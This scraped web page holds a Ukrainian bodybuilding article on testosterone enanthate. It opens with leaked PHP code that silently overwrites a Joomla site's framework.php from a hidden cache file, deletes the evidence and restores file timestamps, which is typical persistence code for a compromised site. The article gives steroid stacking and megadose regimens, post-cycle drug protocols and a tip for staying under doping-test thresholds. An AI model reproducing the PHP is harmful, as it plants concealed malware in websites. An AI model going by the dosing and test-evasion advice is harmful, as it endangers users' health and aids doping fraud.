$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Тестовірон, тестостерон енантат | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Тестовірон, тестостерон енантат

ТестовіронТестостерон енантат відповідає за нормальний розвиток чоловічих статевих органів. При відсутності вироблення тестостерону можливе майже повне вирівнювання функціональних, анаболічних і психічних функцій "(з інструкції із застосування препарату фірми Іенафарм Тестостерон-Депот). Ці рядки ясно показують, яким важливим гормоном є тестостерон. Тестостерон енантат є однією з багатьох діючих хімічних речовин тестостерону. У чоловіка він виробляється в нормі при обумовленому недостатністю андрогенів гіпогонадизмі і анемії. Не дивно, що тестостероненантат знаходить застосування в цій сфері медицини жінок і дітей. У хлопчиків і підлітків він застосовується при терапії росту, а ( Інструкція із застосування, Тестостерон-Депот, Іенафарм) у жінок препарат знаходить застосування в якості додаткового лікування при певних формах пухлин молочних залоз у постменструальний цикл. (Інструкція із застосування Тестовірон-Депот-250, Шерінг). У бодібілдингу - це стероїд з нарощування м'язової маси.

Байдуже, що ви думаєте про Анаболе, Параболане, Андроліке 50 тощо, якщо мова йде про силу, м'язову масу і швидке збільшення у ваги, тестостерон - був і залишається тут "королем королів". Тестостерон енантат - це, як видно вже з багатьох торгових назв, стероїд тривалої дії. Залежно від обміну речовин і гормональної системи дія препарату - 2 - 3 тижні, так що теоретично можливі дуже великі інтервали між ін'єкціями. Хоча тестостерон енантат діє більше декількох тижнів, його вколюють в бодібілдінгу і у важкій атлетиці все ж таки частіше, щонайменше раз на тиждень. Це має сенс, тому що тестостерон енантат в крові має період напіврозпаду усього лише тиждень. Вирішальною перевагою тестостерон енантата є те, що це хімічна речовина з дуже сильним андрогенним та інтенсивним анаболическим ефектами, тому кожному з його допомогою легко в найкоротший час сильно збільшити силу і масу. Швидкий і сильний приріст ваги пов'язаний із значним накопиченням води, тому що відбувається ретенція електролітів і води. Супроводжуючий ефект – неймовірний приріст сили, що супроводжує накопичення води в організмі. Штангісти і спортсмени пауерліфтингу, особливо високих вагових категорій, високо цінують цю властивість препарату. Для них тестостерон енантат і сустанон - стероїди № 1, що відбивається і на дозуваннях. Дози в 500 мг, 1000 мг і навіть у 2000 мг на день - не рідкість, зауважте - в день, не на тиждень! Види спорту, де потрібні груба сила, агресивність, завзяття, - переважна область застосування тестостерон енантата. Доза в межах 2000 - 4000 мг на тиждень не є чимось незвичайним. Такі мегадози вживають перш за все футболісти і спортсмени пауерліфтингу. Сильне накопичення води має й інші переваги. Тестостерон енантат допомагає тим, у кого проблеми з суглобами, тим, хто скаржиться на болі і хрускіт в плечах, і тим, у кого міжхребетні диски мають перші ознаки зносу.

Для спортсменів бодібілдингу викликане тестостерон енантатом скупчення води - палиця з двома кінцями. Звичайно ж, можна швиденько стати масивним і сильним, але через пару тижнів відображення в дзеркалі - це частенько зовсім гладка, плоска, водяниста, набрякла мускулатура. Вона виглядає так, ніби надута повітрям до цих розмірів і при її напрузі нічогісінько не відбувається. Хто не вірить, нехай спробує побачити так званих "чемпіонів бодібілдингу в міжсезонні і в період нарощування, коли вони поглинають неймовірні кількості їдла. Ще одна проблема застосування тестостерон енантата в тому, що він має великий ступінь ароматизованності, тобто перетворення в естрогени. У результаті організм накопичує трохи жиру, крім того явища фемінізації (гінекомастія) не є при цьому чимось незвичайним. Але й тут треба суворо диференціювати, тому що ці явища знаходяться здебільшого у певній залежності від схильності до них. Є атлети, які навіть при дозі в 1000 мг і більше на тиждень не страждають явищами фемінізації, жиро накопичення і накопичують лише незначну кількість води, якщо взагалі накопичують. В той час, як інші вже при вигляді однієї ампули тестовірона депота скаржаться на болі в сосках. І все ж додатковий прийом Нольвадекса і Провірона в дозі 500 мг на тиждень є необхідним. Добре те, що, як вже сказано вище, він діє на будь-якого, будь то новачок або містер Олімпія. Тестостерон енантат дуже сильно до того ж стимулює процеси регенерації в організмі. Тому він швидко діє відносно підвищення життєвого тонусу, припливу енергії і прискорення фаз компенсації. Це є причиною того, що деякі атлети можуть тренуватися 6 разів на тиждень двічі на день та ще й за кілька годин поспіль і при цьому стають все масивнішими і сильнішими. Той, хто через 2 години після посиленого тренування ніг може знову тренуватися, знає, що тут діє "тісто". Атлети, які беруть тестостерон енантат, розповідають про дивовижно сильний ефект насоса під час тренувань. Цей "стероїдний Памп" відбувається внаслідок підвищеного об'єму крові з поліпшеним постачанням організму киснем і великою кількістю еритроцитів крові. Той, хто приймає мегадози тестостерон енантата, відчуває сильний прилив у стегнах і литках навіть при звичайній ходьбі по сходах. Незважаючи на це ми все ж таки хотіли б порадити початківцям в стероїдних курсах триматися подалі від всіх видів тестостерону. Поясню: тим, хто ще жодного разу не брав стероїди, не потрібен ніякий тестостерон, нехай залишать його на майбутнє і приймають його лише тоді, коли "легші" стероїди вже не будуть діяти на них. Для просунутих атлетів можна вже радити прийом тестостерон енантата, причому або тільки його, або в комбінації з іншими препаратами.

Для нарощування маси тестостерон енантат добре комбінується з Анаполоном 50, Діанаболом, Дека-дураболіном і Параболаном. У якості прикладу - комбінація з 100 мг Анаполона 50 в день, 200 мг Дека-дураболін на тиждень і 500 мг тестостерон енантата на тиждень. Через 6 тижнів можна замінити Апаполон 50, наприклад на 30 мг Діанабола на день. В принципі, тестостерон енантат добре комбінується для нарощування маси з будь-яким стероїдом. Мабуть, між андрогеном - тестостеронепантатом - і анаболічними стероїдами є сінергестичний ефект. Ті, хто назбирав занадто багато води з тестостерон енантатом і Діанаболом або Анаполоном, ті, кого більше цікавить сила без додавання у вазі понад 10 кг, той повинен приймати тестостерон енантат разом з оксандролоном або Вінстролом. Загальна прийнята доза, як уже згадувалося, дуже різна і сягає від 250 мг на тиждень до 2000 мг на день. Ми вважаємо, що дозування для більшості атлетів лежить у межах 250 - 1000 мг на тиждень. Більше високих доз в нормі не потрібно. Доза до 500 мг на тиждень приймається, як правило, за раз, таким чином вколюють відразу 2 мл. Більш високу дозу краще розділити на 2 ін'єкції на тиждень. Висота дозування повинна перш за все бути орієнтована на рівень розвитку атлета, його мету і на кількість прийомів попередніх стероїдів. Плавцям відкритих басейнів і культуристам, виступаючим в диско, дози в 1000 мг тестостерон енантата на тиждень не потрібні. Ми дізналися, що дозування тестостерон енантата у багатьох зорієнтоване в першу чергу на гаманець. І так як це не найдешевший тестостерон, більшість, на щастя, беруть небагато. Інші переходять на більш дешевий Омнадрен і "клацають" тісто без кінця.

Тестостерон енантат надає сильний вплив на дугу гіпоталамус - гіпофіз - яєчка. Діяльність гіпофіза від негативного зворотного зв'язку утискається, що негативно впливає на внутрішнє вироблення тестостерона. "Іенафарм" в інструкції по застосуванню свого препарату "Тестостерон Депот" так описує можливі наслідки: "При високодозованій терапії тестостерон-препаратами часто слід рахуватися з припиненням або зниженням сперматогінеза в яєчках, а, отже, і зі зменшенням їх величини". "Шерінг" виробник широко розповсюдженого в бодібілдінгу тестовірона - Депот 250, потрапляє у своїй інструкції в ту ж корзину: "При тривалому і високо дозованому застосуванні тестовірона - Депот 250 може виникнути явище припинення або зниження утворення насіння в яєчках і, отже, зменшення їх величини". Логічний висновок з двох висловлювань припускає додатковий прийом HCG. Ті, хто приймає тестостерон енантат, повинні кожні 6-8 тижнів вводити HCG. Ін'єкція 5000 ме кожен 5-й день протягом 15 днів (в цілому: 3 ін'єкції допоможе зменшити цю проблему). Прийом HCG, Дінеріка, Нольвадекса і Кленбутерола є звичайним в кінці лікування тестостероном. Введення цих препаратів допомагає подолати виникаючу катаболічну фазу і знову підвищити андрогенний рівень тестостерону. Цим може бути знижена наступаюча в будь-якому разі втрата сили і маси. Ті ж, хто після декількох тижнів прийому тестостерон енантата перериває його прийом без введення вище зазначених препаратів, здивується, як швидко його вага та чудова колись пружна мускулатура стають меншими. Навіть повільне відвикання, тобто поетапне зниження дозування, не рятує від цього видимого фіаско. Єдині можливості атлета - прийом тестостерон стимулюючих препаратів (HCG, Дінеріка, Ціклофеніла), анти-катаболічних речовин (Кленбутерол, Ефедрин), дуже дорогих гормонів росту або перехід на більш м'які стероїди (Дека-дураболін, Вінстрол, Прімоболан). З тестостерон енантатом більшість може стати масивними і сильними. Але лише небагато хто в змозі зберегти цю форму після припинення прийому препарату. Це є однією з причин того, чому дійсно хороші спортсмени пауерліфтингу, бодібілдингу, штангісти тощо, майже цілий рік перебувають "на голці".

Побічні явища тестостерон енантата - це перш за все явища, викликані його сильним впливом андрогенну і підвищеним скупченням води в організмі. Як правило, вони і є причиною часто виникаючої, при прийомі тестостерон енант ата, гіпертонії. Ті, хто має високий тиск за природою чи набули його при прийомі препарату, повинні регулярно обстежуватися у лікаря. У даному випадку слід приймати антигіпертоніки, як наприклад, Катапрезан. Багато атлетів страждають під час прийому тестостерон енантата сильним акне вульгаріс (вугрі), особливо помітним на таких частинах тіла, як спина, груди, плечі, руки, трохи менше на обличчі. Особливо це загрожує атлетам, які довго приймають тестостерон енантат. Цікаво, що ці явища трапляються у деяких саме після припинення прийому препарату, що говорить про зворотний ефект. У важких випадках можна застосовувати лікарський засіб: "Роаккутан". Явища фемінізації, особливо гінекомастія, вимагають прийому анти-естрогенів. Що виявляється на початку прийому препарату – це сексуальна суперстимуляція з частими ерекціями - це нормально. У юних спортсменів, поряд з явищами вірилізації тестостерон "може привести до прискореного зростання і дозрівання кісткової тканини, а, отже, до припинення процесу poсту тіла". ("Іенафарм", інструкція із застосування тестостерону тривалої дії). Оскільки в бодібілдінгу успіхів досягають переважно більш досвідчені атлети, молодняк вже на цій підставі повинен добре обдумати рішення: приймати чи ні анаболіки, особливо тестостерон.

Спостерігаються й інші побічні явища: атрофія яєчок, знижений сперматогенезу і, перш за все, підвищена агресивність. Той, хто направляє цю агресивність на свої тренування, а не на своє оточення, може не турбуватися. На жаль цього не скажеш про деяких атлетів, які приймають тестостерон енантат. Тестостерон і Фінаджект - є головними причинами божевілля того чи іншого. І перш за все високі дозування частково винні в асоціальній поведінці приймаючих препарат. Виникає щось на зразок "синдрому супермена". Деніел Дачейн у своїй книзі: "Довідник з стероїдів, 2" дуже зворушливо описує цю проблему: "Останнім часом ми багато читаємо і чуємо в засобах масової інформації про" стероїдні психози ", хоча було б краще назвати їх" психозами мегадоз андрогенів ... "Чоловіки від підвищеної агресивності стають небезпечними і перетворюються на справжніх ідіотів. Спробуйте проїхатися в громадському транспорті в годину пік з 300-фунтовим голодним Громилою, морда якого прикрашена акне". Хоча тестостерон енантат і руйнується в печінці, ця хімічна речовина в розумних дозах малотоксична для печінки, тому зміни показників печінки зустрічаються не так часто, як при алькулірованних по 17-альфа оральних стероїдах. Багато цікавого дізнається атлет про токсичність тестостерону для печінки в книзі "Допінг" Дірка Клазінга при співавторстві з Манфредом Доніка та іншими. Там на стор 60, написано: "ранніми дослідженнями (Крюскемпер, 1975) виноситься вирок стероїдів щодо їх токсичності на печінку. Потім з'ясовується: тестостерон і його складні ефіри не токсичні для печінки або токсичні, але незначно. І це підтверджується клінічними дослідженнями, коли тестостерон приймався навіть при вже пошкодженій печінці (алкогольний цироз печінки) і не викликав додаткових її пошкоджень або яких-небудь змін (Клюд, 1988; Клей, 1982) ". До потенційних побічних явищ відносяться також зниження тембру голосу і прискорене випадання волосся. "Деякі стероїди можуть викликати випадання волосся. Це відноситься швидше до андрогенну, ніж до анаболічних стероїдів, і перш за все до варіантів тестостерону (Деніел Дачейн, Довідник з стероїдів, 2, стор 6)".

Жінки, повинні уникати прийому препарату, тому що інакше можуть виникнути обумовлені андрогенами супроводжуючі ефекти. Вони описуються "Іенафарм" в інструкції із застосування препарату "Тестостерон-Депот": "У жінок при прийомі тестостерона слід зважати на такі явища, як симптоми вірилізації, як, наприклад, акне вульгаріс, гірсутизм, андрогенетична алопезія, зміни в голосі, рідше гіпертрофія клітора і неприродно підвищене лібідо. Зміни в голосі і алопезія незворотні, гірсутизм і гіпертрофія клітора оборотні лише частково". Жінок, які не бояться цього, знайдеш сьогодні на багатьох чемпіонатах. По-нашому, атлетка повинна задовольнятися дозою тестостерон енантата в 250 мг протягом 7 - 10 днів, не більше. І все ж таки в бодібілдингу і перш за все в пауерліфтингу вже зустрічалися у жінок дози і вище, та ще через більш короткі інтервали.

Ще одне, дуже цікаве побічне явище тестостерон енантата згадується в американських журналах з бодібілдингу "Масло Медія 2000", червень-липень 1993, стор 45. Розглядати його як позитивне або негативне судити читачам. "Кілька років тому англійський "Ленсет Медікал Джорнел" написав, що тестостерон (проти всіх анаболічних стероїдів) придатний як помітно ефективний протизаплідний засіб для чоловіків. Протягом року проводилися ретельні наукові дослідження на 230 чоловіках і дійшли висновку, що тижневі ін'єкції гормону тестостерону вважаються надійними, тривалими і ефективними. Відкрили, що тижневі ін'єкції є протизаплідним засобом з гарантією в 99.2%. Цифра перевищує показники протизаплідних пігулок (93%) та препарат значно краще за будь-який презерватив (88%). Дослідження показали, що дія ін'єкцій після їх припинення повністю оборотна і що ін'єкції тестостерону викликають мінімум побічних явищ". Хоча це і не відноситься до теми нашої книги, але все ж щонайменше обґрунтовує необхідність тестостерон стимулюючих препаратів під час і після закінчення курсу прийому тестостерон енантата. Ін'єкція 250 мг кожні 2 - 3 тижні допомагає зберегти силу і масу. Чи є сенс у такій дозі - немає сумніву, тому що справа в тому, що вона дієва. Відносно чемпіонатів з допінг контролями тестостерон енантат - цікава хімічна речовина. Оскільки екзогенний тестостерон виявляється тільки через "тестостерон/епітестостерон - показник". Порада: не перевищуйте критичного співвідношення 6:1.
 
Статті СТЕРОЇДИ Тестовірон, тестостерон енантат